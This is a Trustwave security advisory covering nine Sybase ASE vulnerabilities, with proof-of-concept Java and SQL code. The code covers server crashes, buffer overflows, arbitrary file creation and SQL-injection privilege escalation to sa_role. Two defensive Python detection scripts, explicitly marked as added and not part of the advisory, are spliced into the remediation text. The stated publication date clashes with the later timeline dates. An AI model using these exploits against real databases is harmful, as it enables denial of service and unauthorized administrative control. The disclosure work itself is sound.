Trustwave SpiderLabs Security Advisory TWSL2013-035:
Multiple Vulnerabilities in Sybase Adaptive Server Enterprise

Published: 01/03/13
Version: 1.0

Vendor: Sybase
Product: Adaptive Server Enterprise (ASE)
Product description: Relational database management system for UNIX, Linux, and Microsoft Windows platforms.


Finding 1: Denial of service via the hacmpmsgxchg built-in procedure

Credit: Martin Rakhmanov of Trustwave (formerly Application Security Inc)
CVE: CVE-2013-6867
CWE: CWE-20
Affected versions: Sybase ASE 15.7

Any valid database user can cause a denial of service by invoking the hacmpmsgxchg built-in procedure with missing parameters: as a result the server process dies.

Example:

/*
 * Adjust credentials and target host information in the code
 *
 * Compile with:
 *   javac SSN1893561.java
 * Run with (copy jconn4.jar to the current directory from the Sybase ASE installation):
 *   java -cp jconn4.jar:. SSN1893561
 */

import java.sql.*;
import java.util.Properties;

public class SSN1893561 {
    // Adjust this information
    private static String username = "DB_USER";
    private static String password = "DB_PASSWORD";
    private static String hostname = "192.168.1.1";

    private static String rpc_name = "hacmpmsgxchg";
    private static int ha_cmpgrantrevrole = 109;

    public static void main(String args[]) throws InstantiationException,
            ClassNotFoundException, IllegalAccessException, SQLException {
        Properties props = new Properties();
        props.put("user", username);
        props.put("password", password);
        String url = "jdbc:sybase:Tds:" + hostname + ":5000";
        Driver sybdriver = (Driver) Class.forName("com.sybase.jdbc4.jdbc.SybDriver").newInstance();
        DriverManager.registerDriver(sybdriver);
        Connection conn = DriverManager.getConnection(url, props);
        CallableStatement callablestatement = conn.prepareCall(
                (new StringBuilder()).append("{?=call $").append(rpc_name).append("(?, ?)}").toString());
        byte[] message = new byte[2048];
        for (int i = 0; i < message.length; i++) {
            message[i] = 0x41;
        }
        callablestatement.setBytes(2, message);
        callablestatement.setInt(3, ha_cmpgrantrevrole);
        callablestatement.executeUpdate();
        System.out.println("Done.");
    }
}

Vendor Status: Vendor was contacted and a patch was released.

Remediation Steps:
No workarounds are currently available. Apply one of the following vendor-supplied patches:
Sybase ASE 15.7: apply SP100
Sybase ASE 15.7: apply SP50

Vendor Communication Timeline:
12/03/2012 - Vendor notification
12/04/2012 - Vendor response
09/10/2013 - Patch released by vendor

References:
1. http://www.sybase.com/detail?id=1099371
2. https://service.sap.com/sap/support/notes/1893561


Finding 2: Denial of service via the ssl_admin built-in function

Credit: Martin Rakhmanov of Trustwave (formerly Application Security Inc)
CVE: CVE-2013-6862
CWE: CWE-20
Affected versions: Sybase ASE 15.0, 15.5 and 15.7

Any valid database user can supply an overly long argument to the ssl_admin built-in function, causing a denial-of-service condition: as a result the server process dies.

Example:

-- Denial of service via built-in function
select ssl_admin(replicate('A', 80), 'a', '3', 0)

Vendor Status: Vendor was contacted and a patch was released.

Remediation Steps:
No workarounds are currently available. Apply one of the following vendor-supplied patches:
Sybase ASE 15.7: apply SP100
Sybase ASE 15.7: apply SP50
Sybase ASE 15.5: apply ESD#5.3
Sybase ASE 15.0.3: apply ESD#4.3

Vendor Communication Timeline:
06/20/2012 - Vendor notification
06/26/2012 - Vendor response
09/10/2013 - Patch released by vendor

References:
1. http://www.sybase.com/detail?id=1099371
2. https://service.sap.com/sap/support/notes/1887342


Finding 3: File creation via the TRANSFER TABLE command

Credit: Martin Rakhmanov of Trustwave (formerly Application Security Inc)
CVE: CVE-2013-6864
CWE: CWE-285
Affected versions: Sybase ASE 15.0.3 and later

Any valid database user can create arbitrary files on the database server filesystem via the TRANSFER TABLE command.
One possible scenario is to replace existing libraries and then trigger the server to load the modified versions, thus executing arbitrary code in the server's process context.

Example:

-- TRANSFER TABLE command file creation/overwrite example
use tempdb
go
create table mydlltable (val binary(10))
go
insert into mydlltable values (0x00112233445566778899)
go
-- This creates evil.dll under %SystemRoot%\system32 on a 32-bit Windows box
transfer table mydlltable to 'evil.dll' for bcp
go
drop table mydlltable
go

Vendor Status: Vendor was contacted and a patch was released.

Remediation Steps:
No workarounds are currently available. Apply one of the following vendor-supplied patches:
Sybase ASE 15.7: apply SP100
Sybase ASE 15.7: apply SP50
Sybase ASE 15.5: apply ESD#5.3
Sybase ASE 15.0.3: apply ESD#4.3

Vendor Communication Timeline:
09/27/2012 - Vendor notification
09/27/2012 - Vendor response
09/10/2013 - Patch released by vendor

References:
1. http://www.sybase.com/detail?id=1099371
2. https://service.sap.com/sap/support/notes/1893556


Finding 4: Buffer overflow in the set_password built-in function

Credit: Martin Rakhmanov of Trustwave (formerly Application Security Inc)
CVE: CVE-2013-6865
CWE: CWE-20
Affected versions: Sybase ASE 15.0.3 and later

Any valid database user can supply an overly long argument to the set_password built-in function, causing a stack-based buffer overflow. This may allow execution of arbitrary code in the server's process context.

Example:

-- set_password built-in function stack-based buffer overflow
declare @pwd varbinary(8000)
select @pwd = 0x43444546474800 + REPLICATE(0x41, 7000)
select set_password('DB_PASSWORD', @pwd, null)
select set_password(@pwd, 'DB_PASSWORD', null)
go

Vendor Status: Vendor was contacted and a patch was released.

Remediation Steps:
No workarounds are currently available.
Apply one of the following vendor-supplied patches:
Sybase ASE 15.7: apply SP100
Sybase ASE 15.7: apply SP50
Sybase ASE 15.5: apply ESD#5.3
Sybase ASE 15.0.3: apply ESD#4.3

Vendor Communication Timeline:
02/21/2013 - Vendor notification
02/22/2013 - Vendor response
09/10/2013 - Patch released by vendor

References:
1. http://www.sybase.com/detail?id=1099371
2. https://service.sap.com/sap/support/notes/1893558


Finding 5: Privilege elevation via SQL injection in the UPDATE STATISTICS command

Credit: Martin Rakhmanov of Trustwave (formerly Application Security Inc)
CVE: CVE-2013-6863
CWE: CWE-89
Affected versions: Sybase ASE 15.0.3 and later

Any valid database user can elevate privileges via a specially crafted UPDATE STATISTICS command. The command is vulnerable to SQL injection: the table name is spliced into SQL that the server runs with the highest privileges possible, so a user can execute arbitrary SQL with those privileges.

Example:

-- SQL injection via the UPDATE STATISTICS command
-- Grants sa_role, sso_role server roles to login 'DB_USER'
-- Prerequisite: sp_configure 'max parallel degree', 8
use tempdb
go
create table [sysobjects grant role sa_role, sso_role to DB_USER--](id int)
go
alter table [sysobjects grant role sa_role, sso_role to DB_USER--] partition 2
go
update statistics [sysobjects grant role sa_role, sso_role to DB_USER--] with sampling = 10 percent, calibrate = 1
go

Vendor Status: Vendor was contacted and a patch was released.

Remediation Steps:
No workarounds are currently available.
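Added example, not part of the advisory: an audit over sysobjects rows that flags object names carrying SQL tokens (comment markers, statement separators, GRANT, EXEC, stored procedure names), which is the trace this kind of injection leaves in the catalog. The sample rows are constructed; on a live server they would come from "select name, type, uid from sysobjects" in each database, and the token list is an assumption to tune per site.

```python
import re

# Constructed sample of (name, type, uid) rows as a DBA might pull them
# from sysobjects; not real data. Row 2 mirrors the advisory's payload.
SAMPLE_SYSOBJECTS = [
    ("customers", "U", 1),
    ("sysobjects grant role sa_role, sso_role to DB_USER--", "U", 3),
    ("user_roles", "U", 1),
    ("t1; exec sp_role 'grant', sa_role, DB_USER", "U", 3),
    ("report_2013", "P", 1),
]

# Tokens that have no business inside an object name but become meaningful
# once the name is spliced into a dynamically built statement. Word
# boundaries keep names such as user_roles or grant_history from matching.
SUSPICIOUS = re.compile(
    r"(--|/\*|;|\bgrant\b|\brole\b|\bexec\b|\bsp_\w+)", re.IGNORECASE
)


def flag_suspicious_names(rows):
    """Return (name, uid, sorted lowercase tokens) for names that look injected."""
    hits = []
    for name, _objtype, uid in rows:
        tokens = sorted({m.lower() for m in SUSPICIOUS.findall(name)})
        if tokens:
            hits.append((name, uid, tokens))
    return hits


if __name__ == "__main__":
    for name, uid, tokens in flag_suspicious_names(SAMPLE_SYSOBJECTS):
        print(f"uid={uid} tokens={tokens} name={name!r}")
```
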
Apply one of the following vendor-supplied patches:
Sybase ASE 15.7: apply SP100
Sybase ASE 15.7: apply SP50
Sybase ASE 15.5: apply ESD#5.3
Sybase ASE 15.0.3: apply ESD#4.3

Vendor Communication Timeline:
06/02/2013 - Vendor notification
06/02/2013 - Vendor response
09/10/2013 - Patch released by vendor

References:
1. http://www.sybase.com/detail?id=1099371
2. https://service.sap.com/sap/support/notes/1893440


Finding 6: Privilege elevation by any valid database user via invocation of the hacmpmsgxchg built-in procedure

Credit: Martin Rakhmanov of Trustwave (formerly Application Security Inc)
CVE: CVE-2013-6859
CWE: CWE-285
Affected versions: Sybase ASE 15.0, 15.5 and 15.7

Any valid user can grant themselves or any other user the 'sa_role' fixed server role by invoking the hacmpmsgxchg built-in procedure.

Example:

/*
 * Adjust credentials, target host information and suid in the code
 *
 * Compile with:
 *   javac SSN1849356.java
 * Run with (copy jconn4.jar to the current directory from the Sybase ASE installation):
 *   java -cp jconn4.jar:. SSN1849356
 *
 * Examine the login roles afterwards with sp_displaylogin
 */

import java.sql.*;
import java.util.Properties;

public class SSN1849356 {
    // Adjust this information
    private static String username = "DB_USER";
    private static String password = "DB_PASSWORD";
    private static String hostname = "192.168.1.1";
    private static byte suid = 8;

    private static String rpc_name = "hacmpmsgxchg";
    private static int ha_cmpgrantrevrole = 109;

    public static void main(String args[]) throws InstantiationException,
            ClassNotFoundException, IllegalAccessException, SQLException {
        Properties props = new Properties();
        props.put("user", username);
        props.put("password", password);
        String url = "jdbc:sybase:Tds:" + hostname + ":5000";
        Driver sybdriver = (Driver) Class.forName("com.sybase.jdbc4.jdbc.SybDriver").newInstance();
        DriverManager.registerDriver(sybdriver);
        Connection conn = DriverManager.getConnection(url, props);
        CallableStatement callablestatement = conn.prepareCall(
                (new StringBuilder()).append("{?=call $").append(rpc_name).append("(?, ?)}").toString());
        byte[] message = new byte[150];
        message[80] = 0x09;
        message[81] = 0x00;
        message[82] = 0x00;
        message[83] = 0x00;
        message[88] = 0x00; // role_id: zero means 'sa_role'
        message[89] = 0x00;
        message[90] = 0x00;
        message[91] = 0x00;
        message[136] = 0x01;
        message[137] = 0x00;
        message[138] = 0x00;
        message[139] = 0x00;
        message[140] = suid; // suid to grant the server role to
        message[141] = 0x00;
        message[142] = 0x00;
        message[143] = 0x00;
        callablestatement.setBytes(2, message);
        callablestatement.setInt(3, ha_cmpgrantrevrole);
        callablestatement.executeUpdate();
        System.out.println("Done.");
    }
}

Vendor Status: Vendor was contacted and a patch was released.

Remediation Steps:
No workarounds are currently available.
Apply one of the following vendor-supplied patches:
Sybase ASE 15.7: apply SP100
Sybase ASE 15.7: apply SP50
Sybase ASE 15.5: apply ESD#5.3
Sybase ASE 15.0.3: apply ESD#4.3

Vendor Communication Timeline:
01/23/2012 - Vendor notification
02/21/2012 - Vendor response
09/10/2013 - Patch released by vendor

References:
1. http://www.sybase.com/detail?id=1099371
2. https://service.sap.com/sap/support/notes/1849356


Finding 7: Information disclosure through installation log files on Windows platforms

Credit: Martin Rakhmanov of Trustwave (formerly Application Security Inc)
CVE: CVE-2013-6861
CWE: CWE-200
Affected versions: Sybase ASE 15.0.3 and later

Installation log files contain the cleartext password used for the built-in 'sa' account during installation or upgrade of the server. On the Windows platform these log files are publicly readable.

Example:

After the initial SAP Sybase ASE 15.7 installation, examine the log files under %SYBASE%\ASE-15_0\init\logs\ (publicly readable on Windows platforms): the Job Scheduler configuration step log file contains the initial 'sa' password. The following can be found in the log file:

12/05/12 01:08:42 PM SQL command: if not exists(select name from master.dbo.syslogins where name = 'sa') begin exec sp_addlogin sa, 'DB_PASSWORD' exec sp_adduser sa, sa end
12/05/12 01:08:42 PM SQL command: exec sp_role 'grant', sa_role, sa exec sp_role 'grant', js_admin_role, sa

Vendor Status: Vendor was contacted and a patch was released.

Remediation Steps:
No workarounds are currently available.
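Added example, not the advisory's code: a scanner for the init log directory named above that reports which log lines embed the 'sa' password (reporting only its length, never the value) and produces a redacted copy so the logs can be kept without the secret. The sample log text is constructed from the excerpt above; the directory to scan is an assumption passed in by the caller.

```python
import re
from pathlib import Path

# The line shape the advisory describes in the Job Scheduler step log:
#   exec sp_addlogin sa, '<password>'
# Group 2 is the password; groups 1 and 3 are kept verbatim on redaction.
SA_LOGIN_RE = re.compile(r"(exec\s+sp_addlogin\s+sa\s*,\s*')([^']*)(')", re.IGNORECASE)

# Constructed sample modelled on the advisory's excerpt; not a real log file.
SAMPLE_LOG = """\
12/05/12 01:08:42 PM SQL command: if not exists(select name from master.dbo.syslogins where name = 'sa') begin exec sp_addlogin sa, 'DB_PASSWORD' exec sp_adduser sa, sa end
12/05/12 01:08:42 PM SQL command: exec sp_role 'grant', sa_role, sa exec sp_role 'grant', js_admin_role, sa
"""


def find_sa_password_lines(text):
    """Return (line_number, password_length) for each line embedding the sa password.

    Only the length is returned so the report itself does not re-leak the secret."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        m = SA_LOGIN_RE.search(line)
        if m:
            findings.append((lineno, len(m.group(2))))
    return findings


def redact_sa_password(text):
    """Replace the quoted sa password with '***', leaving the rest of the line intact."""
    return SA_LOGIN_RE.sub(r"\1***\3", text)


def scan_log_dir(log_dir):
    """Scan every file under log_dir (e.g. %SYBASE%\\ASE-15_0\\init\\logs) and map
    path -> findings for files that still contain the password."""
    report = {}
    for path in Path(log_dir).rglob("*"):
        if path.is_file():
            hits = find_sa_password_lines(path.read_text(errors="replace"))
            if hits:
                report[str(path)] = hits
    return report


if __name__ == "__main__":
    print(find_sa_password_lines(SAMPLE_LOG))  # [(1, 11)]
```

After confirming the findings, write the output of redact_sa_password back over the file (or delete the log) and restrict the directory's ACL to administrators.
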
Apply one of the following vendor-supplied patches:
Sybase ASE 15.7: apply SP100
Sybase ASE 15.7: apply SP50
Sybase ASE 15.5: apply ESD#5.3
Sybase ASE 15.0.3: apply ESD#4.3

Vendor Communication Timeline:
12/05/2012 - Vendor notification
12/06/2012 - Vendor response
09/10/2013 - Patch released by vendor

References:
1. http://www.sybase.com/detail?id=1099371
2. https://service.sap.com/sap/support/notes/1809246


Finding 8: Buffer overflow in the config_admin built-in function

Credit: Vladimir Zakharevich of Trustwave (formerly Application Security Inc)
CVE: CVE-2013-6245
CWE: CWE-20
Affected versions: Sybase ASE 15.0, 15.5 and 15.7

The config_admin built-in function fails to validate its input, resulting in a buffer overflow that allows any valid database user to execute arbitrary code in the server's process context.

Example:

declare @cch varbinary(16380)
select @cch = 0x4141414144444400 + REPLICATE('A', 268) + 0x55565758 + REPLICATE('B', 10) + 0x00000000000000000000 + 0x1300 + REPLICATE('C', 16042)
select config_admin(28, 1,0, 0, NULL, @cch)
go

Vendor Status: Vendor was contacted and a patch was released.

Remediation Steps:
No workarounds are currently available. Apply one of the following vendor-supplied patches:
Sybase ASE 15.7: apply SP100
Sybase ASE 15.7: apply SP50
Sybase ASE 15.5: apply ESD#5.3
Sybase ASE 15.0.3: apply ESD#4.3

Vendor Communication Timeline:
03/25/2013 - Vendor notification
04/01/2013 - Vendor response
09/10/2013 - Patch released by vendor

References:
1. http://www.sybase.com/detail?id=1099371
2. https://service.sap.com/sap/support/notes/1893560


Finding 9: Unauthenticated remote backup vulnerability

Credit: Martin Rakhmanov of Trustwave (formerly Application Security Inc)
CVE: CVE-2013-7245
CWE: CWE-285

Versions of Sybase ASE 15.7 prior to SP51 allow unauthenticated users to perform remote backup operations and thus gain access to the database. The Backup Server does not validate the credentials of the backup command requestor.
In SP51 for Sybase ASE 15.7, SAP introduced IP address validation to limit exposure to this vulnerability.

Example:

An attacker adds an entry to their interfaces file pointing to a remote Backup Server and issues the BACKUP command with a UNC path as the destination. Provided that the target Sybase ASE can reach the UNC location, the database backup is written to a location of the attacker's choice. No permissions are checked for this.

Vendor Status: Vendor was contacted and a patch was released.

Remediation Steps:
Apply the following vendor-supplied patch:
Sybase ASE 15.7: apply SP51
As a workaround, a firewall should protect the Backup Server port from remote connections.

Vendor Communication Timeline:
03/25/2013 - Vendor notification
03/27/2013 - Vendor response
12/13/2013 - Patch released by vendor

References:
1. https://service.sap.com/sap/support/notes/1927859


About Trustwave:
Trustwave is the leading provider of on-demand and subscription-based information security and payment card industry compliance management solutions to businesses and government entities throughout the world. For organizations faced with today's challenging data security and compliance environment, Trustwave provides a unique approach with comprehensive solutions that include its flagship TrustKeeper compliance management software and other proprietary security solutions. Trustwave has helped thousands of organizations, ranging from Fortune 500 businesses and large financial institutions to small and medium-sized retailers, manage compliance and secure their network infrastructure, data communications and critical information assets. Trustwave is headquartered in Chicago with offices throughout North America, South America, Europe, Africa, China and Australia.
For more information, visit https://www.trustwave.com

About Trustwave SpiderLabs:
SpiderLabs(R) is the advanced security team at Trustwave focused on application security, incident response, penetration testing, physical security and security research. The team has performed over a thousand incident investigations, thousands of penetration tests and hundreds of application security tests globally. In addition, the SpiderLabs Research team provides intelligence through bleeding-edge research and proof of concept tool development to enhance Trustwave's products and services.
https://www.trustwave.com/spiderlabs

Disclaimer:
The information provided in this advisory is provided "as is" without warranty of any kind. Trustwave disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Trustwave or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Trustwave or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.